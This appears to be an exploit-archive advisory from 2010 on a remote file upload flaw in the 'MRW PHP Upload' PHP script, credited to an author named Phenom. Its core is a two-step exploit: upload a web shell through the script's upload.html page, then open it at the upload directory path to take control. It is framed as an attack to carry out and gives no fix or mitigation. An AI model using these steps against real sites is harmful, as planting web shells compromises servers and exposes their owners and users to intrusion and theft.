[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MRW PHP Upload Remote file upload Vulnerability
# Published : 2010-02-13
# Author : Phenom
# Previous Title : southburn Web (products.php) Sql Injection Vulnerability
# Next Title : StatCounteX 3.1 Multiple Vulnerabilities
# Date: 12/02/2010
# Author: Phenom
# Software Link: http://www.mrwebmaster.it/_store/script/php_luke_mrw_upload.zip
# Version:
# Tested on: Windows xp sp3
------------------------------------------------------
_____ _
| __ | |
| |__) | |__ ___ _ __ ___ _ __ ___
| ___/| '_ / _ '_ / _/| '_ ` _
| | | | | | __/ | | | (_) | | | | | |
|_| |_| |_|___|_| |_|/__/|_| |_| |_|
------------------------------------------------------
####### MRW PHP Upload Remote File Upload Vulnerability #####################
#
# Author : Phenom
#
# vendor : www.lukeonweb.net
#
#################################################################################
####### Exploit #################################################################
#
# 1- http://site.com/path/upload.html
#
# upload your shell
#
# 2- http://site.com/path/upload/yourshell.php
#
# get your shell
#
#################################################################################